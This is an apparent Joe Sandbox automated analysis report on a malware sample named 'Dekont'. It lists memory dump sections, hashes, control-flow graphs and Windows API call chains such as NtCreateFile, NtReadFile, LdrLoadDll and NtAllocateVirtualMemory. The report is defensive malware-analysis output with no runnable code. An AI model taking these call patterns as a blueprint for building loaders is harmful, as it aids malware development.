                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 8ad1cc6d068faec617b04f14d36421fbe79fa447f81428513790152adcfaeb55
                                  • Instruction ID: 730d29a058de29a9d2c2202826b9d56fc8c421e9c1757fe491bf6e808382c85f
                                  • Opcode Fuzzy Hash: 8ad1cc6d068faec617b04f14d36421fbe79fa447f81428513790152adcfaeb55
                                  • Instruction Fuzzy Hash: 9F8158B0A01B058FDB25DF2AD44579ABBF5FF88304F00892DD48ADBA50D775E94ACB90

                                  Control-flow Graph
                                  control_flow_graph 434 271590c-27159d9 CreateActCtxA 436 27159e2-2715a3c 434->436 437 27159db-27159e1 434->437 444 2715a4b-2715a4f 436->444 445 2715a3e-2715a41 436->445 437->436 446 2715a51-2715a5d 444->446 447 2715a60 444->447 445->444 446->447 449 2715a61 447->449 449->449
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 027159C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: f532f521294a1ce9ea5db50fb35eee15f37831457952235462e5f1a8a2993a87
                                  • Instruction ID: f4e8c5d65ecfd22fdd0f7ef9ba9f157d1a3e83c8a4ce413dce844eb764197a2d
                                  • Opcode Fuzzy Hash: f532f521294a1ce9ea5db50fb35eee15f37831457952235462e5f1a8a2993a87
                                  • Instruction Fuzzy Hash: 9B41E0B1C00719CEDB24CFA9C884ADDBBF5BF89304F64816AD409AB251DB75694ACF50

                                  Control-flow Graph
                                  control_flow_graph 450 27144b0-27159d9 CreateActCtxA 453 27159e2-2715a3c 450->453 454 27159db-27159e1 450->454 461 2715a4b-2715a4f 453->461 462 2715a3e-2715a41 453->462 454->453 463 2715a51-2715a5d 461->463 464 2715a60 461->464 462->461 463->464 466 2715a61 464->466 466->466
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 027159C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 5ddfaada4cdfca08f3045201dd9f6624b2300e4fcd413fcd313d66f802184a47
                                  • Instruction ID: 9f686590dd65f447c85469e3fe64c77ddb6d45d619ef56b11539b183abb55151
                                  • Opcode Fuzzy Hash: 5ddfaada4cdfca08f3045201dd9f6624b2300e4fcd413fcd313d66f802184a47
                                  • Instruction Fuzzy Hash: 3141D2B1C0071DCFDB24CFA9C884A9EBBF5BF88304F60815AD409AB255DB756949CF91

                                  Control-flow Graph
                                  control_flow_graph 467 271d751-271d758 468 271d714-271d724 DuplicateHandle 467->468 469 271d75a-271d87e 467->469 471 271d726-271d72c 468->471 472 271d72d-271d74a 468->472 471->472
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D717
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 45522aa76bf54b6c988ae3baf422b14419d61cf72d9ac8553ba587f2ca1f4864
                                  • Instruction ID: e416d464176cf3db67122aa2e51ecef7e0788259ec85dc2ebc2e6bea11201445
                                  • Opcode Fuzzy Hash: 45522aa76bf54b6c988ae3baf422b14419d61cf72d9ac8553ba587f2ca1f4864
                                  • Instruction Fuzzy Hash: 61319238A803808FE311AF60F455B697BA5FBC4714F208579EA518B3C8EBB40865CF10

                                  Control-flow Graph
                                  control_flow_graph 485 271d688-271d724 DuplicateHandle 486 271d726-271d72c 485->486 487 271d72d-271d74a 485->487 486->487
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D717
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: db5894ca9a5e0fc33e5d1fe682cf9cca8b1a6047f36c2043e6ba5eb00d457c10
                                  • Instruction ID: 7df2c327665d7df76618a7cc26400a670cb72cacddf6db46dc64f231cf3c1675
                                  • Opcode Fuzzy Hash: db5894ca9a5e0fc33e5d1fe682cf9cca8b1a6047f36c2043e6ba5eb00d457c10
                                  • Instruction Fuzzy Hash: FC2103B59012099FDB10CFAAD984ADEFBF4EF48310F14801AE918A3210D374A941CFA1

                                  Control-flow Graph
                                  control_flow_graph 490 271d690-271d724 DuplicateHandle 491 271d726-271d72c 490->491 492 271d72d-271d74a 490->492 491->492
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0271D717
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: dffe14f691b8003e916c1f468abc4fd1585a8c4ae0b104d03117d75c5d316466
                                  • Instruction ID: 080e2051835ce3d00487ca5fdf46ae2c218662bf35746a1cb74b16ad851dd389
                                  • Opcode Fuzzy Hash: dffe14f691b8003e916c1f468abc4fd1585a8c4ae0b104d03117d75c5d316466
                                  • Instruction Fuzzy Hash: C721C4B59002499FDB10CF9AD984ADEBBF8EF48310F14841AE914A3350D375A954DFA5

                                  Control-flow Graph
                                  control_flow_graph 495 271af98-271afd8 496 271afe0-271b00b GetModuleHandleW 495->496 497 271afda-271afdd 495->497 498 271b014-271b028 496->498 499 271b00d-271b013 496->499 497->496 499->498
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0271AFFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: d2db5bf4559132b5e07213db1ad44b2953047d73bc68833e69d38359531cea97
                                  • Instruction ID: f8e9fa93bba4eadb8aec3bcefc0f4ea036d3b5b7bcda93ef714a4019f98b8c3c
                                  • Opcode Fuzzy Hash: d2db5bf4559132b5e07213db1ad44b2953047d73bc68833e69d38359531cea97
                                  • Instruction Fuzzy Hash: FA1110B6C003498FCB20CF9AC944ADEFBF8EF88324F10842AD529A7210D375A545CFA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066116357.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c3d000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c133d62bf5f935cf17bb4130b1058c035fd579b0a233f89a865acaeb8c1eb88d
                                  • Instruction ID: 1c4e8079101b35b40864967768442644661506254bc0d01717b9f25d29956e9b
                                  • Opcode Fuzzy Hash: c133d62bf5f935cf17bb4130b1058c035fd579b0a233f89a865acaeb8c1eb88d
                                  • Instruction Fuzzy Hash: 362129B5514204DFDB05DF14E9C0B26BF65FB98324F24C56DE90B0B25AC33AE856CBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066469761.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_25ed000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31a3ac24587f3b103e3209ef5ba9b33451a54a3376886d532383c84dd75e5bd3
                                  • Instruction ID: d039adb8f735d59926dad75407e5fdd9af087480f4597839b931b7c6ec5acfa7
                                  • Opcode Fuzzy Hash: 31a3ac24587f3b103e3209ef5ba9b33451a54a3376886d532383c84dd75e5bd3
                                  • Instruction Fuzzy Hash: FE21D075605204DFDF19DF14D984B26BFB9FB88324F28C969D80A4B246D33BD806CA65
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066469761.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_25ed000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83518376221d756a59360232b9725d86ece8e332b54c21a8d03e5c37e85eeeeb
                                  • Instruction ID: 530cc7e0e331cf57753a1062e2a1794b4b30e4c6ee47e21eb4297a6ed2945337
                                  • Opcode Fuzzy Hash: 83518376221d756a59360232b9725d86ece8e332b54c21a8d03e5c37e85eeeeb
                                  • Instruction Fuzzy Hash: 91210775504200DFDF09DF14D9C0B26BF79FB88314F24C9ADD80A4B296C33AD406CA65
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066469761.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_25ed000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04ba003bb872f166549bd4b6ae82d21b8cfc749d4f7628e3b6573c994aabc122
                                  • Instruction ID: dc70ef7234d8c1cad43be0409207ef4fe97d4e1dbf2444dfac14e56f7061378a
                                  • Opcode Fuzzy Hash: 04ba003bb872f166549bd4b6ae82d21b8cfc749d4f7628e3b6573c994aabc122
                                  • Instruction Fuzzy Hash: 3D215E755093808FDB16CF24D994715BF71FB46214F28C5DAD8898B6A7C33A980ACB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066116357.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c3d000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                  • Instruction ID: 20603a2156d799b4d1abd4e8b9b36646d7515c6967506d8c34040d7ec2ce0bdb
                                  • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                  • Instruction Fuzzy Hash: 53110376404240CFCB02CF10E5C4B16BF71FB94324F24C2A9D80A0B256C33AE95ACBA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066469761.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_25ed000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                  • Instruction ID: 8bffca08286d38bdccab2a29e8c5dd6a4e4868c17a2c5ff115cb624f02aafe06
                                  • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                  • Instruction Fuzzy Hash: 6A118B7A904280DFDB16CF14D6C4B15BFB1FB84314F24C6ADD84A4B696C33AD44ACB61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066116357.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c3d000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93d5c1875a51ed04caf4400a811502397d5f6e178e764dcd969756cd83686d31
                                  • Instruction ID: e9435037b4033a2c9bc72e7469fd620c44cfd7e5e827bc58ffda34ec350b0fc1
                                  • Opcode Fuzzy Hash: 93d5c1875a51ed04caf4400a811502397d5f6e178e764dcd969756cd83686d31
                                  • Instruction Fuzzy Hash: F3012B720043449AE7119E26DDC4B66BF98DF43370F18C55AED1A4A28AD2399D40CAB1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066116357.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c3d000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63c836d634ee4ae86cbc99272a1baf9b7a63dba08108bc2f8747c2c881f21692
                                  • Instruction ID: a47a950c8e6106cdc504f7e685fa52447e25b04e2dbd47113d851efb08e77f51
                                  • Opcode Fuzzy Hash: 63c836d634ee4ae86cbc99272a1baf9b7a63dba08108bc2f8747c2c881f21692
                                  • Instruction Fuzzy Hash: ECF0C2724043449AE7108E15D988B62FF98EB52334F18C05AED094A28AC2799C40CAB1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecaf5c1dfee661666b1eec6c1ec1981280a323a399a31cc4fa817aaccc45657f
                                  • Instruction ID: 324137d09a5ed9af22ae530ac0b35cf97b23bd86fd688a595dff7e6f51d78a14
                                  • Opcode Fuzzy Hash: ecaf5c1dfee661666b1eec6c1ec1981280a323a399a31cc4fa817aaccc45657f
                                  • Instruction Fuzzy Hash: 6EA15B36E007198FCF06DFB8C88459EB7B2FF85304B25856AE805AB265DB31E955CF81

                                  Execution Graph

                                  Execution Coverage:1.4%
                                  Dynamic/Decrypted Code Coverage:2.7%
                                  Signature Coverage:5.8%
                                  Total number of Nodes:552
                                  Total number of Limit Nodes:68
                                  execution_graph 95287 41f180 95288 41f18b 95287->95288 95290 41b940 95287->95290 95291 41b966 95290->95291 95298 409d40 95291->95298 95293 41b972 95294 41b993 95293->95294 95306 40c1c0 95293->95306 95294->95288 95296 41b985 95342 41a680 95296->95342 95345 409c90 95298->95345 95300 409d54 95300->95293 95301 409d4d 95301->95300 95357 409c30 95301->95357 95307 40c1e5 95306->95307 95770 40b1c0 95307->95770 95309 40c23c 95774 40ae40 95309->95774 95311 40c4b3 95311->95296 95312 40c262 95312->95311 95783 4143a0 95312->95783 95314 40c2a7 95314->95311 95786 408a60 95314->95786 95316 40c2eb 95316->95311 95794 41a4d0 95316->95794 95320 40c341 95321 40c348 95320->95321 95806 419fe0 95320->95806 95323 41bd90 2 API calls 95321->95323 95325 40c355 95323->95325 95325->95296 95326 40c392 95327 41bd90 2 API calls 95326->95327 95328 40c399 95327->95328 95328->95296 95329 40c3a2 95330 40f4a0 3 API calls 95329->95330 95331 40c416 95330->95331 95331->95321 95332 40c421 95331->95332 95333 41bd90 2 API calls 95332->95333 95334 40c445 95333->95334 95811 41a030 95334->95811 95337 419fe0 2 API calls 95338 40c480 95337->95338 95338->95311 95816 419df0 95338->95816 95341 41a680 2 API calls 95341->95311 95343 41af30 LdrLoadDll 95342->95343 95344 41a69f ExitProcess 95343->95344 95344->95294 95376 418b90 95345->95376 95349 409cb6 95349->95301 95350 409cac 95350->95349 95383 41b280 95350->95383 95352 409cf3 95352->95349 95394 409ab0 95352->95394 95354 409d13 95400 409620 LdrLoadDll 95354->95400 95356 409d25 95356->95301 95358 409c4a 95357->95358 95359 41b570 LdrLoadDll 95357->95359 95745 41b570 95358->95745 95359->95358 95362 41b570 LdrLoadDll 95363 409c71 95362->95363 95364 40f180 95363->95364 95365 40f199 95364->95365 95753 40b040 95365->95753 95367 40f1ac 95757 41a1b0 95367->95757 95370 409d65 95370->95293 95372 40f1d2 95373 40f1fd 95372->95373 95763 41a230 95372->95763 95374 41a460 2 API calls 95373->95374 95374->95370 95377 418b9f 95376->95377 95401 414e50 
95377->95401 95379 409ca3 95380 418a40 95379->95380 95407 41a5d0 95380->95407 95384 41b299 95383->95384 95414 414a50 95384->95414 95386 41b2b1 95387 41b2ba 95386->95387 95453 41b0c0 95386->95453 95387->95352 95389 41b2ce 95389->95387 95471 419ed0 95389->95471 95397 409aca 95394->95397 95723 407ea0 95394->95723 95396 409ad1 95396->95354 95397->95396 95736 408160 95397->95736 95400->95356 95402 414e6a 95401->95402 95405 414e5e 95401->95405 95402->95379 95404 414fbc 95404->95379 95405->95402 95406 4152d0 LdrLoadDll 95405->95406 95406->95404 95410 41af30 95407->95410 95409 418a55 95409->95350 95411 41af40 95410->95411 95412 41af62 95410->95412 95413 414e50 LdrLoadDll 95411->95413 95412->95409 95413->95412 95415 414d85 95414->95415 95417 414a64 95414->95417 95415->95386 95417->95415 95479 419c20 95417->95479 95418 414b44 95419 414b90 95418->95419 95420 414b73 95418->95420 95423 414b7d 95418->95423 95484 41a330 95419->95484 95541 41a430 LdrLoadDll 95420->95541 95423->95386 95424 414bb7 95425 41bd90 2 API calls 95424->95425 95426 414bc3 95425->95426 95426->95423 95427 414d49 95426->95427 95428 414d5f 95426->95428 95433 414c52 95426->95433 95429 41a460 2 API calls 95427->95429 95550 414790 LdrLoadDll NtReadFile NtClose 95428->95550 95430 414d50 95429->95430 95430->95386 95432 414d72 95432->95386 95434 414cb9 95433->95434 95436 414c61 95433->95436 95434->95427 95435 414ccc 95434->95435 95543 41a2b0 95435->95543 95438 414c66 95436->95438 95439 414c7a 95436->95439 95542 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 95438->95542 95442 414c97 95439->95442 95443 414c7f 95439->95443 95442->95430 95499 414410 95442->95499 95487 4146f0 95443->95487 95445 414c70 95445->95386 95447 414d2c 95547 41a460 95447->95547 95448 414c8d 95448->95386 95451 414caf 95451->95386 95452 414d38 95452->95386 95454 41b0d1 95453->95454 95455 41b0e3 95454->95455 95568 41bd10 95454->95568 95455->95389 95457 41b104 95571 414070 95457->95571 95459 41b150 95459->95389 95460 41b127 
95460->95459 95461 414070 3 API calls 95460->95461 95463 41b149 95461->95463 95463->95459 95596 415390 95463->95596 95464 41b1da 95465 41b1ea 95464->95465 95690 41aed0 LdrLoadDll 95464->95690 95606 41ad40 95465->95606 95468 41b218 95685 419e90 95468->95685 95472 41af30 LdrLoadDll 95471->95472 95473 419eec 95472->95473 95717 1012c0a 95473->95717 95474 419f07 95476 41bd90 95474->95476 95720 41a640 95476->95720 95478 41b329 95478->95352 95480 419c3c 95479->95480 95481 41af30 LdrLoadDll 95479->95481 95480->95418 95482 41af30 LdrLoadDll 95480->95482 95481->95480 95483 419c7c 95482->95483 95483->95418 95485 41af30 LdrLoadDll 95484->95485 95486 41a34c NtCreateFile 95485->95486 95486->95424 95488 41470c 95487->95488 95489 41a2b0 LdrLoadDll 95488->95489 95490 41472d 95489->95490 95491 414734 95490->95491 95492 414748 95490->95492 95493 41a460 2 API calls 95491->95493 95494 41a460 2 API calls 95492->95494 95495 41473d 95493->95495 95496 414751 95494->95496 95495->95448 95551 41bfa0 LdrLoadDll RtlAllocateHeap 95496->95551 95498 41475c 95498->95448 95500 41445b 95499->95500 95502 41448e 95499->95502 95503 41a2b0 LdrLoadDll 95500->95503 95501 4145d9 95504 41a2b0 LdrLoadDll 95501->95504 95502->95501 95507 4144aa 95502->95507 95505 414476 95503->95505 95511 4145f4 95504->95511 95506 41a460 2 API calls 95505->95506 95508 41447f 95506->95508 95509 41a2b0 LdrLoadDll 95507->95509 95508->95451 95510 4144c5 95509->95510 95513 4144e1 95510->95513 95514 4144cc 95510->95514 95564 41a2f0 LdrLoadDll 95511->95564 95517 4144e6 95513->95517 95518 4144fc 95513->95518 95516 41a460 2 API calls 95514->95516 95515 41462e 95519 41a460 2 API calls 95515->95519 95520 4144d5 95516->95520 95521 41a460 2 API calls 95517->95521 95526 414501 95518->95526 95552 41bf60 95518->95552 95522 414639 95519->95522 95520->95451 95523 4144ef 95521->95523 95522->95451 95523->95451 95534 414513 95526->95534 95555 41a3e0 95526->95555 95527 414567 95528 41457e 95527->95528 95563 41a270 LdrLoadDll 95527->95563 95529 
414585 95528->95529 95530 41459a 95528->95530 95532 41a460 2 API calls 95529->95532 95533 41a460 2 API calls 95530->95533 95532->95534 95535 4145a3 95533->95535 95534->95451 95536 4145cf 95535->95536 95558 41bb60 95535->95558 95536->95451 95538 4145ba 95539 41bd90 2 API calls 95538->95539 95540 4145c3 95539->95540 95540->95451 95541->95423 95542->95445 95544 41af30 LdrLoadDll 95543->95544 95545 414d14 95544->95545 95546 41a2f0 LdrLoadDll 95545->95546 95546->95447 95548 41af30 LdrLoadDll 95547->95548 95549 41a47c NtClose 95548->95549 95549->95452 95550->95432 95551->95498 95565 41a600 95552->95565 95554 41bf78 95554->95526 95556 41a3fc NtReadFile 95555->95556 95557 41af30 LdrLoadDll 95555->95557 95556->95527 95557->95556 95559 41bb84 95558->95559 95560 41bb6d 95558->95560 95559->95538 95560->95559 95561 41bf60 2 API calls 95560->95561 95562 41bb9b 95561->95562 95562->95538 95563->95528 95564->95515 95566 41af30 LdrLoadDll 95565->95566 95567 41a61c RtlAllocateHeap 95566->95567 95567->95554 95691 41a510 95568->95691 95570 41bd3d 95570->95457 95572 414081 95571->95572 95574 414089 95571->95574 95572->95460 95573 41435c 95573->95460 95574->95573 95694 41cf00 95574->95694 95576 4140dd 95577 41cf00 2 API calls 95576->95577 95580 4140e8 95577->95580 95578 414136 95581 41cf00 2 API calls 95578->95581 95580->95578 95699 41cfa0 95580->95699 95582 41414a 95581->95582 95583 41cf00 2 API calls 95582->95583 95585 4141bd 95583->95585 95584 41cf00 2 API calls 95592 414205 95584->95592 95585->95584 95587 414334 95706 41cf60 LdrLoadDll RtlFreeHeap 95587->95706 95589 41433e 95707 41cf60 LdrLoadDll RtlFreeHeap 95589->95707 95591 414348 95708 41cf60 LdrLoadDll RtlFreeHeap 95591->95708 95705 41cf60 LdrLoadDll RtlFreeHeap 95592->95705 95594 414352 95709 41cf60 LdrLoadDll RtlFreeHeap 95594->95709 95597 4153a1 95596->95597 95598 414a50 8 API calls 95597->95598 95599 4153b7 95598->95599 95600 4153f2 95599->95600 95601 415405 95599->95601 95605 41540a 95599->95605 95602 41bd90 2 API calls 
95600->95602 95603 41bd90 2 API calls 95601->95603 95604 4153f7 95602->95604 95603->95605 95604->95464 95605->95464 95710 41ac00 95606->95710 95609 41ac00 LdrLoadDll 95610 41ad5d 95609->95610 95611 41ac00 LdrLoadDll 95610->95611 95612 41ad66 95611->95612 95613 41ac00 LdrLoadDll 95612->95613 95614 41ad6f 95613->95614 95615 41ac00 LdrLoadDll 95614->95615 95616 41ad78 95615->95616 95617 41ac00 LdrLoadDll 95616->95617 95618 41ad81 95617->95618 95619 41ac00 LdrLoadDll 95618->95619 95620 41ad8d 95619->95620 95621 41ac00 LdrLoadDll 95620->95621 95622 41ad96 95621->95622 95623 41ac00 LdrLoadDll 95622->95623 95624 41ad9f 95623->95624 95625 41ac00 LdrLoadDll 95624->95625 95626 41ada8 95625->95626 95627 41ac00 LdrLoadDll 95626->95627 95628 41adb1 95627->95628 95629 41ac00 LdrLoadDll 95628->95629 95630 41adba 95629->95630 95631 41ac00 LdrLoadDll 95630->95631 95632 41adc6 95631->95632 95633 41ac00 LdrLoadDll 95632->95633 95634 41adcf 95633->95634 95635 41ac00 LdrLoadDll 95634->95635 95636 41add8 95635->95636 95637 41ac00 LdrLoadDll 95636->95637 95638 41ade1 95637->95638 95639 41ac00 LdrLoadDll 95638->95639 95640 41adea 95639->95640 95641 41ac00 LdrLoadDll 95640->95641 95642 41adf3 95641->95642 95643 41ac00 LdrLoadDll 95642->95643 95644 41adff 95643->95644 95645 41ac00 LdrLoadDll 95644->95645 95646 41ae08 95645->95646 95647 41ac00 LdrLoadDll 95646->95647 95648 41ae11 95647->95648 95649 41ac00 LdrLoadDll 95648->95649 95650 41ae1a 95649->95650 95651 41ac00 LdrLoadDll 95650->95651 95652 41ae23 95651->95652 95653 41ac00 LdrLoadDll 95652->95653 95654 41ae2c 95653->95654 95655 41ac00 LdrLoadDll 95654->95655 95656 41ae38 95655->95656 95657 41ac00 LdrLoadDll 95656->95657 95658 41ae41 95657->95658 95659 41ac00 LdrLoadDll 95658->95659 95660 41ae4a 95659->95660 95661 41ac00 LdrLoadDll 95660->95661 95662 41ae53 95661->95662 95663 41ac00 LdrLoadDll 95662->95663 95664 41ae5c 95663->95664 95665 41ac00 LdrLoadDll 95664->95665 95666 41ae65 95665->95666 95667 41ac00 LdrLoadDll 95666->95667 95668 
41ae71 95667->95668 95669 41ac00 LdrLoadDll 95668->95669 95670 41ae7a 95669->95670 95671 41ac00 LdrLoadDll 95670->95671 95672 41ae83 95671->95672 95673 41ac00 LdrLoadDll 95672->95673 95674 41ae8c 95673->95674 95675 41ac00 LdrLoadDll 95674->95675 95676 41ae95 95675->95676 95677 41ac00 LdrLoadDll 95676->95677 95678 41ae9e 95677->95678 95679 41ac00 LdrLoadDll 95678->95679 95680 41aeaa 95679->95680 95681 41ac00 LdrLoadDll 95680->95681 95682 41aeb3 95681->95682 95683 41ac00 LdrLoadDll 95682->95683 95684 41aebc 95683->95684 95684->95468 95686 41af30 LdrLoadDll 95685->95686 95687 419eac 95686->95687 95716 1012df0 LdrInitializeThunk 95687->95716 95688 419ec3 95688->95389 95690->95465 95692 41a52c NtAllocateVirtualMemory 95691->95692 95693 41af30 LdrLoadDll 95691->95693 95692->95570 95693->95692 95695 41cf10 95694->95695 95696 41cf16 95694->95696 95695->95576 95697 41bf60 2 API calls 95696->95697 95698 41cf3c 95697->95698 95698->95576 95700 41cfc5 95699->95700 95702 41cffd 95699->95702 95701 41bf60 2 API calls 95700->95701 95703 41cfda 95701->95703 95702->95580 95704 41bd90 2 API calls 95703->95704 95704->95702 95705->95587 95706->95589 95707->95591 95708->95594 95709->95573 95711 41ac1b 95710->95711 95712 414e50 LdrLoadDll 95711->95712 95713 41ac3b 95712->95713 95714 414e50 LdrLoadDll 95713->95714 95715 41ace7 95713->95715 95714->95715 95715->95609 95716->95688 95718 1012c11 95717->95718 95719 1012c1f LdrInitializeThunk 95717->95719 95718->95474 95719->95474 95721 41a65c RtlFreeHeap 95720->95721 95722 41af30 LdrLoadDll 95720->95722 95721->95478 95722->95721 95724 407eb0 95723->95724 95725 407eab 95723->95725 95726 41bd10 2 API calls 95724->95726 95725->95397 95729 407ed5 95726->95729 95727 407f38 95727->95397 95728 419e90 2 API calls 95728->95729 95729->95727 95729->95728 95730 407f3e 95729->95730 95734 41bd10 2 API calls 95729->95734 95739 41a590 95729->95739 95732 407f64 95730->95732 95733 41a590 2 API calls 95730->95733 95732->95397 95735 407f55 95733->95735 

                                  Control-flow Graph

                                  APIs
                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1JA$rMA$rMA
                                  • API String ID: 2738559852-782607585
                                  • Opcode ID: 7aaaa16702adae6d23ede2d680456887a62317e53decf251faaf94379e42fb99
                                  • Instruction ID: 40098347e2ccfe5138c34a84cead36b309c134ff29b5ac5e9c21c1f122b9f0a0
                                  • Opcode Fuzzy Hash: 7aaaa16702adae6d23ede2d680456887a62317e53decf251faaf94379e42fb99
                                  • Instruction Fuzzy Hash: BD0129B2211104ABCB14DF99CC85EEB77A9EF8C364F158649FA1D97251C630E912CBA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 8 41a3e0-41a3f6 9 41a3fc-41a429 NtReadFile 8->9 10 41a3f7 call 41af30 8->10 10->9
                                  APIs
                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
